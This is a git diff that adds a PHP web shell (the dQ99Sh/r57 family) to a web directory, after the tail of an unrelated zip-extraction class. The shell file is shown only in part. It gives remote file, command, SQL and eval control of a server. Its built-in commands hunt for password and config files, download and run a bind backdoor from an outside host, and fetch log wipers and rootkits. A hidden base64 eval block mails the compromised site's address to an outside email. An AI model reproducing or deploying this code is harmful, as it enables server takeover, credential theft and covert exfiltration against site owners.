+    $header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data);
+
+    if ($header['filename_len'] != 0)
+      $header['filename'] = fread($zip,$header['filename_len']);
+    else $header['filename'] = '';
+
+    if ($header['extra_len'] != 0)
+      $header['extra'] = fread($zip, $header['extra_len']);
+    else $header['extra'] = '';
+
+    if ($header['comment_len'] != 0)
+      $header['comment'] = fread($zip, $header['comment_len']);
+    else $header['comment'] = '';
+
+    if ($header['mdate'] && $header['mtime'])
+    {
+      $hour = ($header['mtime'] & 0xF800) >> 11;
+      $minute = ($header['mtime'] & 0x07E0) >> 5;
+      $seconde = ($header['mtime'] & 0x001F)*2;
+      $year = (($header['mdate'] & 0xFE00) >> 9) + 1980;
+      $month = ($header['mdate'] & 0x01E0) >> 5;
+      $day = $header['mdate'] & 0x001F;
+      $header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year);
+    } else {
+      $header['mtime'] = time();
+    }
+    $header['stored_filename'] = $header['filename'];
+    $header['status'] = 'ok';
+    if (substr($header['filename'], -1) == '/')
+      $header['external'] = 0x41FF0010;
+    return $header;
+ }
+
+ function ReadCentralDir($zip,$zip_name){
+	$size = filesize($zip_name);
+
+	if ($size < 277) $maximum_size = $size;
+	else $maximum_size=277;
+	
+	@fseek($zip, $size-$maximum_size);
+	$pos = ftell($zip); $bytes = 0x00000000;
+	
+	while ($pos < $size){
+		$byte = @fread($zip, 1); $bytes=($bytes << 8) | ord($byte);
+		if ($bytes == 0x504b0506 or $bytes == 0x2e706870504b0506){ $pos++;break;} $pos++;
+	}
+	
+	$fdata=fread($zip,18);
+	
+	$data=@unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',$fdata);
+	
+	if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']);
+	else $centd['comment'] = ''; $centd['entries'] = $data['entries'];
+	$centd['disk_entries'] = $data['disk_entries'];
+	$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start'];
+	$centd['size'] = $data['size'];  $centd['disk'] = $data['disk'];
+	return $centd;
+  }
+
+ function ExtractFile($header,$to,$zip){
+	$header = $this->readfileheader($zip);
+	
+	if(substr($to,-1)!="/") $to.="/";
+	if($to=='./') $to = '';	
+	$pth = explode("/",$to.$header['filename']);
+	$mydir = '';
+	for($i=0;$i<count($pth)-1;$i++){
+		if(!$pth[$i]) continue;
+		$mydir .= $pth[$i]."/";
+		if((!is_dir($mydir) && @mkdir($mydir,0777)) || (($mydir==$to.$header['filename'] || ($mydir==$to && $this->total_folders==0)) && is_dir($mydir)) ){
+			@chmod($mydir,0777);
+			$this->total_folders ++;
+			echo "Ŀ¼: $mydir<br>";
+		}
+	}
+	
+	if(strrchr($header['filename'],'/')=='/') return;	
+
+	if (!($header['external']==0x41FF0010)&&!($header['external']==16)){
+		if ($header['compression']==0){
+			$fp = @fopen($to.$header['filename'], 'wb');
+			if(!$fp) return(-1);
+			$size = $header['compressed_size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 2048 ? $size : 2048);
+				$buffer = fread($zip, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+			fclose($fp);
+			touch($to.$header['filename'], $header['mtime']);
+		}else{
+			$fp = @fopen($to.$header['filename'].'.gz','wb');
+			if(!$fp) return(-1);
+			$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']),
+			Chr(0x00), time(), Chr(0x00), Chr(3));
+			
+			fwrite($fp, $binary_data, 10);
+			$size = $header['compressed_size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 1024 ? $size : 1024);
+				$buffer = fread($zip, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+		
+			$binary_data = pack('VV', $header['crc'], $header['size']);
+			fwrite($fp, $binary_data,8); fclose($fp);
+	
+			$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress");
+			if(!$gzp) return(-2);
+			$fp = @fopen($to.$header['filename'],'wb');
+			if(!$fp) return(-1);
+			$size = $header['size'];
+		
+			while ($size != 0){
+				$read_size = ($size < 2048 ? $size : 2048);
+				$buffer = gzread($gzp, $read_size);
+				$binary_data = pack('a'.$read_size, $buffer);
+				@fwrite($fp, $binary_data, $read_size);
+				$size -= $read_size;
+			}
+			fclose($fp); gzclose($gzp);
+		
+			touch($to.$header['filename'], $header['mtime']);
+			@unlink($to.$header['filename'].'.gz');
+			
+		}
+	}
+	
+	$this->total_files ++;
+	echo "�ļ�: $to$header[filename]<br>";
+	return true;
+ }
+}
+ob_end_flush();
+
+?>
\ No newline at end of file
diff --git a/www-7jyewu-cn/国外免杀PHP大马_未翻译.php b/www-7jyewu-cn/国外免杀PHP大马_未翻译.php
new file mode 100644
index 0000000..c4a7229
--- /dev/null
+++ b/www-7jyewu-cn/国外免杀PHP大马_未翻译.php
@@ -0,0 +1,3112 @@
+<?php
+#######################################
+## r57gentr dQ99Sh 2.0.03.09         ##
+define('sh_ver',"2.0.03.09");        ##
+## By diKi                           ##
+## ?03-09 2008 FeeLCoMz Community   ##
+## Written under PHP 5.2.5           ##
+#######################################
+$sh_name = sh_name();                ##
+#######################################
+#$sh_mainurl        = "http://localhost/dQ99SH/";
+$sh_mainurl        = "http://waterski21.com/bbs/config/tool/";
+#$dQ99sh_updateurl  = $sh_mainurl."dQ99sh_update.php";
+$dQ99sh_sourcesurl = $sh_mainurl."readme.txt";
+$sh_sourcez = array(
+  "dQ99Sh"   => array($sh_mainurl."readme.txt","kiddie.php"),
+  "psyBNC"   => array($sh_mainurl."dQBNC.tar.gz","dQBNC.tar.gz"),
+  "Eggdrop"  => array($sh_mainurl."allnet.tar.gz","allnet.tar.gz"),
+  "BindDoor" => array($sh_mainurl."bind.tgz","bind.tgz"),
+);
+##[ AUTHENTICATION ]##
+$auth = array(
+  "login"     => "",
+  "pass"      => "",
+  "md5pass"   => "",
+  "hostallow" => array("*"),
+  "denied"    => "<a href=\"$sh_mainurl\">".$sh_name."</a>: access denied!",
+);
+##[ END AUTHENTICATION ]##
+$curdir = "./";
+$tmpdir = "";
+$tmpdir_logs = "./";
+$log_email = "ayam@jago.us"; #Email logna
+$sess_cookie = "dQ99shcook";
+$sort_default = "0a"; #Pengurutan, 0 - nomor kolom. "a"scending atau "d"escending
+$sort_save = TRUE; #Simpan posisi pengurutan menggunakan cookies.
+$usefsbuff = TRUE;
+$copy_unset = FALSE; #Hapus file yg telah di-copy setelah dipaste
+$surl_autofill_include = TRUE;
+$updatenow   = FALSE;
+$gzipencode  = TRUE;
+$filestealth = TRUE; #TRUE, tidak merubah waktu modifikasi dan akses.
+$hexdump_lines = 8;
+$hexdump_rows = 24;
+$millink = milw0rm();
+$win = strtolower(substr(PHP_OS,0,3)) == "win";
+$disablefunc = getdisfunc();
+##[ END OF CONFIGS ]##
+error_reporting(E_ERROR | E_PARSE);
+@ini_set("max_execution_time",0);
+@set_time_limit(0); #No dQ in SafeMode
+@ignore_user_abort(TRUE);
+@set_magic_quotes_runtime(0);
+define("starttime",getmicrotime());
+if (get_magic_quotes_gpc()) { strips($GLOBALS); }
+$_REQUEST = array_merge($_COOKIE,$_GET,$_POST);
+@$f = $_REQUEST["f"];
+@extract($_REQUEST["dQ99shcook"]);
+foreach($_REQUEST as $k => $v) { if (!isset($$k)) { $$k = $v; } }
+$dQbuff = "JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RdQ0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gImRROTlTaGVsbCBodHRwOi8vJHRhcmdldCBzYW1hICR2aXNpdG9yIjsNCiAgJGJvZHkgICAgPSAiQnVnOiAkdGFyZ2V0IHNhbWEgJHZpc2l0b3I8YnI+IjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiZGhpZXF3ZWJtYXJrZXJAeWFob28uY29tIiwkanVkdWwsJGJvZHkpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw=="; eval(base64_decode($dQbuff));
+if ($surl_autofill_include) {
+  $include = "&";
+  foreach (explode("&",getenv("QUERY_STRING")) as $v) {
+    $v = explode("=",$v);
+    $name = urldecode($v[0]);
+    $value = @urldecode($v[1]);
+    foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {
+      if (strpos($value,$needle) === 0) {
+        $includestr .= urlencode($name)."=".urlencode($value)."&";
+      }
+    }
+  }
+}
+if (empty($surl)) {
+  $surl = "?".$includestr;
+  $surl = htmlspecialchars($surl);
+}
+## FILE TYPES ##
+$ftypes  = array(
+  "html"     => array("html","htm","shtml"),
+  "txt"      => array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
+  "exe"      => array("sh","install","bat","cmd"),
+  "ini"      => array("ini","inf","conf"),
+  "code"     => array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
+  "img"      => array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
+  "sdb"      => array("sdb"),
+  "phpsess"  => array("sess"),
+  "download" => array("exe","com","pif","src","lnk","zip","rar","gz","tar")
+);
+$exeftypes  = array(
+  getenv("PHPRC")." -q %f%" => array("php","php3","php4"),
+  "perl %f%"                => array("pl","cgi")
+);
+$regxp_highlight  = array(
+  array(basename($_SERVER["PHP_SELF"]),1,"<font color=#FFFF00>","</font>"),
+  array("\.tgz$",1,"<font color=#C082FF>","</font>"),
+  array("\.gz$",1,"<font color=#C082FF>","</font>"),
+  array("\.tar$",1,"<font color=#C082FF>","</font>"),
+  array("\.bz2$",1,"<font color=#C082FF>","</font>"),
+  array("\.zip$",1,"<font color=#C082FF>","</font>"),
+  array("\.rar$",1,"<font color=#C082FF>","</font>"),
+  array("\.php$",1,"<font color=#00FF00>","</font>"),
+  array("\.php3$",1,"<font color=#00FF00>","</font>"),
+  array("\.php4$",1,"<font color=#00FF00>","</font>"),
+  array("\.jpg$",1,"<font color=#00FFFF>","</font>"),
+  array("\.jpeg$",1,"<font color=#00FFFF>","</font>"),
+  array("\.JPG$",1,"<font color=#00FFFF>","</font>"),
+  array("\.JPEG$",1,"<font color=#00FFFF>","</font>"),
+  array("\.ico$",1,"<font color=#00FFFF>","</font>"),
+  array("\.gif$",1,"<font color=#00FFFF>","</font>"),
+  array("\.png$",1,"<font color=#00FFFF>","</font>"),
+  array("\.htm$",1,"<font color=#00CCFF>","</font>"),
+  array("\.html$",1,"<font color=#00CCFF>","</font>"),
+  array("\.txt$",1,"<font color=#C0C0C0>","</font>")
+);
+## QUICK COMMANDS ##
+if (!$win) {
+  $cmdaliases = array(
+    array("", "ls -al"),
+    array("Find all suid files", "find / -type f -perm -04000 -ls"),
+    array("Find suid files in current dir", "find . -type f -perm -04000 -ls"),
+    array("Find all sgid files", "find / -type f -perm -02000 -ls"),
+    array("Find sgid files in current dir", "find . -type f -perm -02000 -ls"),
+    array("Find config.inc.php files", "find / -type f -name config.inc.php"),
+    array("Find config* files", "find / -type f -name \"config*\""),
+    array("Find config* files in current dir", "find . -type f -name \"config*\""),
+    array("Find all writable folders and files", "find / -perm -2 -ls"),
+    array("Find all writable folders and files in current dir", "find . -perm -2 -ls"),
+    array("Find all writable folders", "find / -type d -perm -2 -ls"),
+    array("Find all writable folders in current dir", "find . -type d -perm -2 -ls"),
+    array("Find all service.pwd files", "find / -type f -name service.pwd"),
+    array("Find service.pwd files in current dir", "find . -type f -name service.pwd"),
+    array("Find all .htpasswd files", "find / -type f -name .htpasswd"),
+    array("Find .htpasswd files in current dir", "find . -type f -name .htpasswd"),
+    array("Find all .bash_history files", "find / -type f -name .bash_history"),
+    array("Find .bash_history files in current dir", "find . -type f -name .bash_history"),
+    array("Find all .fetchmailrc files", "find / -type f -name .fetchmailrc"),
+    array("Find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"),
+    array("List file attributes on a Linux second extended file system", "lsattr -va"),
+    array("Show opened ports", "netstat -an | grep -i listen")
+  );
+  $cmdaliases2 = array(
+    array("wget & extract psyBNC","wget ".$sh_mainurl."dQ.tgz;tar -zxf dQ.tgz"),
+    array("wget & extract EggDrop","wget ".$sh_mainurl."dQb.tgz;tar -zxf dQb.tgz"),
+    array("-----",""),
+    array("Logged in users","w"),
+    array("Last to connect","lastlog"),
+    array("Find Suid bins","find /bin /usr/bin /usr/local/bin /sbin /usr/sbin /usr/local/sbin -perm -4000 2> /dev/null"),
+    array("User Without Password","cut -d: -f1,2,3 /etc/passwd | grep ::"),
+    array("Can write in /etc/?","find /etc/ -type f -perm -o+w 2> /dev/null"),
+    array("Downloaders?","which wget curl w3m lynx fetch lwp-download"),
+    array("CPU Info","cat /proc/version /proc/cpuinfo"),
+    array("Is gcc installed ?","locate gcc"),
+    array("Format box (DANGEROUS)","rm -Rf"),
+    array("-----",""),
+    array("wget WIPELOGS PT1","wget http://www.packetstormsecurity.org/UNIX/penetration/log-wipers/zap2.c"),
+    array("gcc WIPELOGS PT2","gcc zap2.c -o zap2"),
+    array("Run WIPELOGS PT3","./zap2"),
+    array("-----",""),
+    array("wget RatHole 1.2 (Linux & BSD)","wget http://packetstormsecurity.org/UNIX/penetration/rootkits/rathole-1.2.tar.gz"),
+    array("wget & run BindDoor","wget ".$sh_mainurl."bind.tgz;tar -zxvf bind.tgz;./4877"),
+    array("wget Sudo Exploit","wget http://www.securityfocus.com/data/vulnerabilities/exploits/sudo-exploit.c"),
+  );
+}
+else {
+  $cmdaliases = array(
+    array("", "dir"),
+    array("Find index.php in current dir", "dir /s /w /b index.php"),
+    array("Find *config*.php in current dir", "dir /s /w /b *config*.php"),
+    array("Find c99shell in current dir", "find /c \"c99\" *"),
+    array("Find r57shell in current dir", "find /c \"r57\" *"),
+    array("Find dQ99shell in current dir", "find /c \"dQ99\" *"),
+    array("Show active connections", "netstat -an"),
+    array("Show running services", "net start"),
+    array("User accounts", "net user"),
+    array("Show computers", "net view"),
+  );
+}
+## PHP FILESYSTEM TRICKS (By diKi) ##
+$phpfsaliases = array(
+    array("Read File", "read", 1, "File", ""),
+    array("Write File (PHP5)", "write", 2, "File","Text"),
+    array("Copy", "copy", 2, "From", "To"),
+    array("Rename/Move", "rename", 2, "File", "To"),
+    array("Delete", "delete", 1 ,"File", ""),
+    array("Make Dir","mkdir", 1, "Dir", ""),
+    array("Download", "download", 2, "URL", "To"),
+    array("Download (Binary Safe)", "downloadbin", 2, "URL", "To"),
+    array("Change Perm (0755)", "chmod", 2, "File", "Perms"),
+    array("Find Writable Dir", "fwritabledir", 2 ,"Dir"),
+    array("Find Pathname Pattern", "glob",2 ,"Dir", "Pattern"),
+);
+## QUICK LAUNCH ##
+$quicklaunch1 = array(
+    array("<img src=\"".$surl."act=img&img=home\" alt=\"Home\" border=\"0\">",$surl),
+    array("<img src=\"".$surl."act=img&img=back\" alt=\"Back\" border=\"0\">","#\" onclick=\"history.back(1)"),
+    array("<img src=\"".$surl."act=img&img=forward\" alt=\"Forward\" border=\"0\">","#\" onclick=\"history.go(1)"),
+    array("<img src=\"".$surl."act=img&img=up\" alt=\"Up\" border=\"0\">",$surl."act=ls&d=%upd&sort=%sort"),
+    array("<img src=\"".$surl."act=img&img=search\" alt=\"Search\" border=\"0\">",$surl."act=search&d=%d"),
+    array("<img src=\"".$surl."act=img&img=buffer\" alt=\"Buffer\" border=\"0\">",$surl."act=fsbuff&d=%d")
+);
+$quicklaunch2 = array(
+    array("Security Info",$surl."act=security&d=%d"),
+    array("Processes",$surl."act=processes&d=%d"),
+    array("MySQL",$surl."act=sql&d=%d"),
+    array("Eval",$surl."act=eval&d=%d"),
+    array("Encoder",$surl."act=encoder&d=%d"),
+    array("Mailer",$surl."act=dQmailer"),
+    array("milw0rm",$millink),
+    array("Md5-Lookup","http://darkc0de.com/database/md5lookup.html"),
+    array("Toolz",$surl."act=tools&d=%d"),
+    array("Kill-Shell",$surl."act=selfremove"),
+    array("Feedback",$surl."act=feedback"),
+    array("Update",$surl."act=update"),
+    array("About",$surl."act=about")
+);
+if (!$win) {
+  $quicklaunch2[] = array("<br>FTP-Brute",$surl."act=ftpquickbrute&d=%d");
+}
+## HIGHLIGHT CODE ##
+$highlight_background = "#C0C0C0";
+$highlight_bg = "#FFFFFF";
+$highlight_comment = "#6A6A6A";
+$highlight_default = "#0000BB";
+$highlight_html = "#1300FF";
+$highlight_keyword = "#007700";
+$highlight_string = "#000000";
+####################
+##[ AUTHENTICATE ]##
+####################
+$tmp = array();
+foreach ($auth["hostallow"] as $k => $v) {
+  $tmp[] = str_replace("\\*",".*",preg_quote($v));
+}
+$s = "!^(".implode("|",$tmp).")$!i";
+if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {
+  exit("<a href=\"$sh_mainurl\">$sh_name</a>: Access Denied - Your host (".getenv("REMOTE_ADDR").") not allowed");
+}
+if (!empty($auth["login"])) {
+  if (empty($auth["md5pass"])) { $auth["md5pass"] = md5($auth["pass"]); }
+  if (($_SERVER["PHP_AUTH_USER"] != $auth["login"]) or (md5($_SERVER["PHP_AUTH_PW"]) != $auth["md5pass"])) {
+    header("WWW-Authenticate: Basic realm=\"".$sh_name.": Restricted Area\"");
+    header("HTTP/1.0 401 Unauthorized");
+    die($auth["denied"]);
+  }
+}
+## END AUTHENTICATE ##
+
+if ($act != "img") {
+  $lastdir = realpath(".");
+  chdir($curdir);
+  if ($updatenow) { @ob_clean(); dQ99sh_getupdate(1); exit; }
+  $sess_data = @unserialize($_COOKIE["$sess_cookie"]);
+  if (!is_array($sess_data)) { $sess_data = array(); }
+  if (!is_array($sess_data["copy"])) { $sess_data["copy"] = array(); }
+  if (!is_array($sess_data["cut"])) { $sess_data["cut"] = array(); }
+  dQ99_buff_prepare();
+  foreach (array("sort","sql_sort") as $v) {
+    if (!empty($_GET[$v])) {$$v = $_GET[$v];}
+    if (!empty($_POST[$v])) {$$v = $_POST[$v];}
+  }
+  if ($sort_save) {
+    if (!empty($sort)) {setcookie("sort",$sort);}
+    if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);}
+  }
+  if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return FALSE;}}
+  if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return FALSE;}}
+  if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return FALSE;}}
+  if (!function_exists("mysql_dump")) {
+    function mysql_dump($set) {
+      global $sh_ver;
+      $sock = $set["sock"];
+      $db = $set["db"];
+      $print = $set["print"];
+      $nl2br = $set["nl2br"];
+      $file = $set["file"];
+      $add_drop = $set["add_drop"];
+      $tabs = $set["tabs"];
+      $onlytabs = $set["onlytabs"];
+      $ret = array();
+      $ret["err"] = array();
+      if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
+      if (empty($db)) {$db = "db";}
+      if (empty($print)) {$print = 0;}
+      if (empty($nl2br)) {$nl2br = 0;}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (empty($file)) {
+        $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql";
+      }
+      if (!is_array($tabs)) {$tabs = array();}
+      if (empty($add_drop)) {$add_drop = TRUE;}
+      if (sizeof($tabs) == 0) {
+        //Retrieve tables-list
+        $res = mysql_query("SHOW TABLES FROM ".$db, $sock);
+        if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
+      }
+      $out = "
+      # Dumped by ".$sh_name."
+      #
+      # Host settings:
+      # MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"."
+      # Date: ".date("d.m.Y H:i:s")."
+      # DB: \"".$db."\"
+      #---------------------------------------------------------";
+      $c = count($onlytabs);
+      foreach($tabs as $tab) {
+        if ((in_array($tab,$onlytabs)) or (!$c)) {
+          if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
+          //Receieve query for create table structure
+          $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
+          if (!$res) {$ret["err"][] = mysql_smarterror();}
+          else {
+            $row = mysql_fetch_row($res);
+            $out .= $row["1"].";\n\n";
+            //Receieve table variables
+            $res = mysql_query("SELECT * FROM `$tab`", $sock);
+            if (mysql_num_rows($res) > 0) {
+              while ($row = mysql_fetch_assoc($res)) {
+                $keys = implode("`, `", array_keys($row));
+                $values = array_values($row);
+                foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
+                $values = implode("', '", $values);
+                $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
+                $out .= $sql;
+              }
+            }
+          }
+        }
+      }
+      $out .= "#---------------------------------------------------------------------------------\n\n";
+      if ($file) {
+        $fp = fopen($file, "w");
+        if (!$fp) {$ret["err"][] = 2;}
+        else {
+          fwrite ($fp, $out);
+          fclose ($fp);
+        }
+      }
+      if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
+      return $out;
+    }
+  }
+  if (!function_exists("mysql_buildwhere")) {
+    function mysql_buildwhere($array,$sep=" and",$functs=array()) {
+      if (!is_array($array)) {$array = array();}
+      $result = "";
+      foreach($array as $k=>$v) {
+        $value = "";
+        if (!empty($functs[$k])) {$value .= $functs[$k]."(";}
+        $value .= "'".addslashes($v)."'";
+        if (!empty($functs[$k])) {$value .= ")";}
+        $result .= "`".$k."` = ".$value.$sep;
+      }
+      $result = substr($result,0,strlen($result)-strlen($sep));
+      return $result;
+    }
+  }
+  if (!function_exists("mysql_fetch_all")) {
+    function mysql_fetch_all($query,$sock) {
+      if ($sock) {$result = mysql_query($query,$sock);}
+      else {$result = mysql_query($query);}
+      $array = array();
+      while ($row = mysql_fetch_array($result)) {$array[] = $row;}
+      mysql_free_result($result);
+      return $array;
+    }
+  }
+  if (!function_exists("mysql_smarterror")) {
+    function mysql_smarterror($type,$sock) {
+      if ($sock) {$error = mysql_error($sock);}
+      else {$error = mysql_error();}
+      $error = htmlspecialchars($error);
+      return $error;
+    }
+  }
+  if (!function_exists("mysql_query_form")) {
+    function mysql_query_form() {
+      global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct;
+      if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "<b>Error:</b> <br>".$sql_query_error."<br>";}
+      if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
+      if ((!$submit) or ($sql_act)) {
+        echo "<table border=0><tr><td><form name=\"dQ99sh_sqlquery\" method=POST><b>"; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".htmlspecialchars($sql_query)."</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".htmlspecialchars($sql_tbl)."\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".htmlspecialchars($sql_goto)."\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
+        if ($tbl_struct) {
+          echo "<td valign=\"top\"><b>Fields:</b><br>";
+          foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ <a href=\"#\" onclick=\"document.dQ99sh_sqlquery.sql_query.value+='`".$name."`';\"><b>".$name."</b></a><br>";}
+          echo "</td></tr></table>";
+        }
+      }
+      if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
+    }
+  }
+  if (!function_exists("mysql_create_db")) {
+    function mysql_create_db($db,$sock="") {
+      $sql = "CREATE DATABASE `".addslashes($db)."`;";
+      if ($sock) {return mysql_query($sql,$sock);}
+      else {return mysql_query($sql);}
+    }
+  }
+  if (!function_exists("mysql_query_parse")) {
+    function mysql_query_parse($query) {
+      $query = trim($query);
+      $arr = explode (" ",$query);
+      $types = array(
+        "SELECT"=>array(3,1),
+        "SHOW"=>array(2,1),
+        "DELETE"=>array(1),
+        "DROP"=>array(1)
+      );
+      $result = array();
+      $op = strtoupper($arr[0]);
+      if (is_array($types[$op])) {
+        $result["propertions"] = $types[$op];
+        $result["query"]  = $query;
+        if ($types[$op] == 2) {
+          foreach($arr as $k=>$v) {
+            if (strtoupper($v) == "LIMIT") {
+              $result["limit"] = $arr[$k+1];
+              $result["limit"] = explode(",",$result["limit"]);
+              if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);}
+              unset($arr[$k],$arr[$k+1]);
+            }
+          }
+        }
+      }
+      else {return FALSE;}
+    }
+  }
+  if ($act == "gofile") {
+    if (is_dir($f)) { $act = "ls"; $d = $f; }
+    else { $act = "f"; $d = dirname($f); $f = basename($f); }
+  }
+  ## HEADERS ##
+  @ob_start();
+  @ob_implicit_flush(0);
+  header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
+  header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
+  header("Cache-Control: no-store, no-cache, must-revalidate");
+  header("Cache-Control: post-check=0, pre-check=0", FALSE);
+  header("Pragma: no-cache");
+  if (empty($tmpdir)) {
+    $tmpdir = ini_get("upload_tmp_dir");
+    if (is_dir($tmpdir)) {$tmpdir = "/tmp/";}
+  }
+  $tmpdir = realpath($tmpdir);
+  $tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir);
+  if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;}
+  if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;}
+  else {$tmpdir_logs = realpath($tmpdir_logs);}
+  $sort = htmlspecialchars($sort);
+  if (empty($sort)) {$sort = $sort_default;}
+  $sort[1] = strtolower($sort[1]);
+  $DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE");
+  if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();}
+  $DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"<a href=\"".$surl."act=phpinfo\" target=\"_blank\"><b><u>PHP/".phpversion()."</u></b></a>",htmlspecialchars($DISP_SERVER_SOFTWARE));
+  @ini_set("highlight.bg",$highlight_bg);
+  @ini_set("highlight.comment",$highlight_comment);
+  @ini_set("highlight.default",$highlight_default);
+  @ini_set("highlight.html",$highlight_html);
+  @ini_set("highlight.keyword",$highlight_keyword);
+  @ini_set("highlight.string",$highlight_string);
+  if (!is_array($actbox)) { $actbox = array(); }
+  $dspact = $act = htmlspecialchars($act);
+  $disp_fullpath = $ls_arr = $notls = null;
+  $ud = @urlencode($d);
+  if (empty($d)) {$d = realpath(".");}
+  elseif(realpath($d)) {$d = realpath($d);}
+  $d = str_replace("\\",DIRECTORY_SEPARATOR,$d);
+  if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;}
+  $d = str_replace("\\\\","\\",$d);
+  $dispd = htmlspecialchars($d);
+  $safemode = safemode();
+  if ($safemode) {
+    $hsafemode = "<font color=#3366FF><b>SAFE MODE IS ON</b></font>";
+    $safemodeexecdir = @ini_get("safe_mode_exec_dir");
+  }
+  else { $hsafemode = "<font color=#FF9900><b>SAFE MODE IS OFF</b></font>"; }
+  $v = @ini_get("open_basedir");
+  if ($v or strtolower($v) == "on") {
+    $openbasedir = TRUE;
+    $hopenbasedir = "<font color=red>".$v."</font>";
+  }
+  else {
+    $openbasedir = FALSE;
+    $hopenbasedir = "<font color=green>OFF (not secure)</font>";
+  }
+  
+##################
+##[ HTML START ]##
+##################
+function srv_info($title,$contents) {
+  echo "<tr><th>$title</th><td>:</td><td>$contents</td></tr>\n";
+}
+echo htmlhead($hsafemode);
+echo "<table id=pagebar>";
+echo "<tr><td colspan=2>\n";
+echo "<div class=fleft>$hsafemode</div>\n";
+echo "<div class=fright>";
+echo "IP Address: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".@gethostbyname($_SERVER["HTTP_HOST"])."\">".@gethostbyname($_SERVER["HTTP_HOST"])."</a> ".
+     "You: <a href=\"http://ws.arin.net/cgi-bin/whois.pl?queryinput=".$_SERVER["REMOTE_ADDR"]."\">".$_SERVER["REMOTE_ADDR"]."</a> ".
+     ($win?"Drives: ".disp_drives($d,$surl):"");
+echo "</div>\n</td></tr>\n";
+echo "<tr><td width=50%>\n";
+echo "<table class=info>\n";
+srv_info("Software","".$DISP_SERVER_SOFTWARE);
+srv_info("Uname",php_uname());
+srv_info("User",($win) ? get_current_user()." (uid=".getmyuid()." gid=".getmygid().")" : dQ99exec("id"));
+echo "</table></td>\n".
+     "<td width=50%>\n";
+echo "<table class=info>\n";
+srv_info("Freespace",disp_freespace($d));
+echo "</table></td></tr>\n";
